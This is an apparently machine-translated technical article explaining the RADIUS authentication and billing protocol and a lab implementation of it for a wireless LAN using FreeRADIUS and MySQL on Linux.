Principles and implementation of RADIUS protocol in Wireless LAN

Abstract: radius is a protocol widely used for network authentication, authorization, and billing. Based on the principles of the RADIUS protocol, this article analyzes and designs the implementation of the radius protocol.

1 Introduction

Remote Authentication Dial-Up user service protocol (RADIUS) was initially proposed by Livingston to provide authentication and billing for dial-up users. After many improvements, it gradually becomes a common network authentication and billing Protocol and is defined in rfc2865 and rfc2866 files submitted by IETF. The radius protocol works in Client/Server mode. The client is the Network Access Server (NAS). It submits authentication, billing, and other information to the RADIUS server. The RADIUS server processes the information and returns the result to the NAs.

The RADIUS protocol is widely used in mobile, data, and Intelligent Network Authentication and billing systems. In the 802.1X Authentication Framework of the wireless LAN, RADIUS protocol is also recommended on the authentication end.

This article will discuss the principle of RADIUS protocol, and discuss its application and implementation scheme in WLAN.

2 RADIUS protocol

2.1 WLAN Network Model

For a commercial wireless LAN, you can use LAN switches to implement port control in the 802.1x authentication protocol. To ensure network security, add a firewall to the egress and authentication end of the wireless LAN. RADIUS servers and databases can also adopt a master-slave structure to ensure network robustness.

Shows the network model:

Figure 1 Wireless LAN Network Model

The authentication terminal of the wireless LAN is composed of a RADIUS server, a network access server (NAS), and a database. Where:

NAS: acts as the client of the RADIUS server and transfers user authentication information to the RADIUS server. After authentication, the user sends the billing information to the RADIUS server.

RADIUS server: as the central server of the authentication system, it is connected to NAS and database. It accepts information submitted from NAS, performs corresponding operations on the database, and returns the processing result to NAs.

Database: stores all user information, billing information, and other information. User information is added to the database by the network administrator. The billing information is from the RADIUS server. Other information includes log information.

2.2 radius packet structure

Radius is the protocol at the application layer. In the transport layer, its packets are encapsulated in UDP packets and then encapsulated into the IP packet. Port 1812 is used for RADIUS Authentication, and port 1813 is used for billing.

The packet structure after radius encapsulation on Ethernet:

Radius data packets are divided into five parts:

(1) code: 1 byte, used to distinguish the radius package type: common types include:

Access-request, code = 1; access-accept, code = 2; access-reject, code = 3; billing request (accounting-request), code = 4, etc.

(2) identifier: a byte used for matching requests and response packets.

(3) Length: the length of the radius data zone (including code, identifier, length, authenticator, and attributes). The Unit is byte. The minimum value is 20 and the maximum value is 4096.

(4) authenticator: 16 bytes, used to verify the server response, and also used to encrypt the user password. Shared Secret (shared secret) and request authentication code (request authenticator) and response authentication code (Response authenticator) of the RADIUS server and NAS support integrity and authentication of sending and receiving packets. In addition, the user password cannot be transmitted in plain text between the NAS and the RADIUS server. Generally, the shared secret and authenticator are used for encryption and hiding through the MD5 encryption algorithm.

(5) attributes: the minimum length is 0 bytes. attributes of the RADIUS protocol, such as the user name, password, and IP address, are stored in this data segment.

2.3 RADIUS Authentication and billing process

1 network model:

(1) When the applicant logs on to the network, NAS will have a user-defined login prompt asking the applicant to enter the user information (user name and password). The applicant will enter the relevant authentication information and wait for the authentication result.

(2) After obtaining user information, NAS sends an "Access-request" packet to the RADIUS server based on the radius packet format. The package generally includes the following radius attribute values: User Name, user password, Access Server ID, and access port ID.

(3) When the RADIUS server receives the "access request" package, it first verifies that the NAS shared password is consistent with the preset password in the RADIUS server to confirm that it belongs to the radius client. After checking the correctness of the package, the RADIUS server checks whether the user record exists in the user database based on the user name in the package. If the user information does not match, an "Access-reject" packet is sent to NAs. After receiving the REJECT packet, NAS immediately stops the service requirement of the user's connection port, and the user is forced to exit.

(4) If all user information is correct, the server sends an "Access-Challenge" packet to NAs to further verify the user's login request. These include user passwords, IP addresses used to log on to the server, and physical port numbers used to log on to the server. After receiving the "access question" package, NAS displays the message to the user, asking the user to further confirm the login request. After the user confirms the request again, the RADIUS server compares the request information twice and determines how to respond to the user (send access-accept, access-reject, or access-challenge again ).

(5) After all the verification conditions and handshake sessions are passed, the RADIUS server places the user configuration information in the database in the "Access-accept" packet and returns it to the NAs, the latter limits the user's network access capability based on the configuration information in the package. Including service types: slip, PPP, Login User, rlogin, framed, and callback. It also includes configuration information related to the service type: IP address, time limit, and so on.

(6) After all authentication and authorization are completed, the control port of the LAN switch is opened. You can access the network through a vswitch. Meanwhile, NAS sends the "billing request start" packet to the RADIUS server, notifying the RADIUS server to start billing. When a user goes offline, NAS sends the "billing request end" packet (accounting-request stop) to the RADIUS server. The RADIUS server calculates the network usage fee based on the billing package information.

3. Design and Implementation of RADIUS Authentication System in WLAN Model

3.1 simplify the WLAN Network Model

In the simulated environment of the lab, because there are few network users, medium and small databases can be used to store the required information, and the RADIUS server and the database can be implemented on the same host. LAN switches can implement port control. The network structure can be simplified as follows:

Figure 2 WLAN Network Model in a lab environment

3.2 NAS Design

(1) radius client processing program: receives information from the applicant, submits authentication, billing, management and other data packets to the RADIUS server, and returns corresponding results to the applicant.

(2) Server Management Program: To facilitate the Administrator's management of RADIUS servers and databases, the administrator can also run server management programs on the NAS host. The management program functions include: administrator module (add or delete network administrators, set administrator permissions, and so on); User information module (for user query, add, delete, and other operations); billing information module (for querying user billing information, create, modify, and delete various billing methods, such as) and log information modules.

(3) Submission of user information: You need to submit user information to NAs. There are multiple methods to achieve this. The simplest method is web-based submission. Create a web server on nas so that you can directly use a browser to interact with Nas. After receiving the information submitted by the user, the web server sends the information to the client processing program of the radius. The latter encapsulates the information into the access-request packet format of the radius, and sends an authentication request to the RADIUS server through the authentication port (1812.

(4) Submission of billing information: after the authentication is passed, the NAS client passes the authentication port (1812) send the "accounting-request start" packet containing the user name, user IP address, and Internet Start Time To the RADIUS server to notify the RADIUS server to start billing. The RADIUS server records the corresponding items in the database and returns the "billing response" Package (accounting-response ). When a user goes offline, NAS sends the "billing request end" packet (accounting-request stop) containing the end time and data traffic to the RADIUS server ). The latter returns the "billing response" Package (accounting-response) for confirmation.

(5) Submit the Server Management Program: submit the application to the RADIUS server through the radius client processing program. The client handler packs management program requests into the standard radius packet format and submits the requests to the RADIUS server by defining a port number for the server administrator.

3.3 RADIUS Server Design

The RADIUS server processes various data from NAS, performs database operations, and returns corresponding results. The protocol communication between the radius client and the server uses socket programming.

(1) database operations: the RADIUS server establishes a connection with the database through the database interface. Use SQL statements on the RADIUS server to implement the required database operation modules (such as querying, adding, and modifying user, billing, and administrator information ), when the RADIUS server needs to operate on the database, it calls the corresponding module.

(2) authentication Package handling: the authentication packet submitted by NAS is monitored through the * authentication port (1812). After receiving the authentication packet, query the database to verify the user, return the result from Port 1812 in the form of a radius packet. Multi-thread processing is used for concurrent application by multiple users.

(3) handling of the billing package: when the user passes the authentication, query the user's billing information. Determine the billing type and rate. After submitting a billing package to the NAS on the billing port (1813, add the billing information submitted in the "billing request start" package to the database, including the user name and start time of the Internet access ). After receiving the "billing request ended" from the user's offline network, the user's Internet access duration and data traffic are calculated based on the user end time and data traffic information submitted in the package, the fee is calculated based on the user's billing type and recorded in the database.

(4) Server Management Program request processing: * The port (custom) of the management program request. After receiving the request, the server unpacks the request and executes the corresponding processing function.

3.4 Database Design

Stores all user information and billing information. Table items in the database should include at least the following types:

(1) User information: including user name, password, authentication method, access permission, and payment method.

(2) authorization information: configuration information, such as the service type and session time, that the server returns to the user.

(3) billing information: stores various statistical information related to billing. Such as: Internet access time, billing rate, user

Data Traffic and fees, user account balance, and so on.

(4) Administrator information: the Administrator's ID and password, and administrator's permissions.

(5) NAs information: Each NAS record to which the RADIUS server belongs. Including the ID of each NAS, and

The shared password of the RADIUS server.

(6) log information: saves the user's online history and the logon and Operation Records of the network administrator.

3.5 Implementation of each part of the authentication end:

Operating System: both the RADIUS server and NAS use Linux (Red Hat 9.0, kernel Linux-2.4.20-8) as the operating system.

(1) NAs:

Use Apache and tomcat to build a web server that supports JSP, so that the applicant can submit login information through the web page. The Server Manager processes the information of the system administrator and uses qt3.0 to complete the user interface. The radius Client Program (implemented in c) encapsulates the messages submitted by the user or the system administrator into a radius package and forwards them to the RADIUS server through the corresponding port.

(2) database:

MySQL is a multi-user, multi-thread SQL database server. It consists of a server daemon mysqld and many different client programs and libraries. Red Hat 9.0 comes with the MySQL service and starts the service. We can connect the RADIUS server to the SQL database, establish a user database and a billing database, and effectively manage user information and billing information.

(3) RADIUS server:

The freeradius-0.9.0 is used to build the RADIUS server, implement the RADIUS protocol, and use the EAP-identity authentication method of the RADIUS server (that is, the RADIUS server authenticates the user name and password of the applicant ). FreeRADIUS code is open-source and can be downloaded at www.freeradius.org. In addition, the database processing module and the server management program processing module are added to the FreeRADIUS source code.

FreeRADIUS supports access to the SQL database. First, you need to create a radius database (take MYSQL as an example: mysql-uroot-prootpass radius <db_mysql. SQL). The created database contains the following table items: radcheck: used to specify the user authentication method. radgroupcheck: Manages user groups and specifies the attributes of each group. For example, the default authentication result of some user groups is accept or reject. radgroupreply: set the response attribute for each user group; usergroup: Specifies the relationship between the user and the group; radacct: stores various billing-related statistics. We can also add some other table items that we need.

4 Conclusion

The RADIUS protocol was initially used in dial-up networks and has become a protocol for authentication, authorization, and billing of multiple networks due to its ease of management and good scalability. However, the RADIUS Protocol still has security defects such as response authenticatior-based attacks on shared keys and user-password-based attacks on user passwords. These issues need further research and improvement.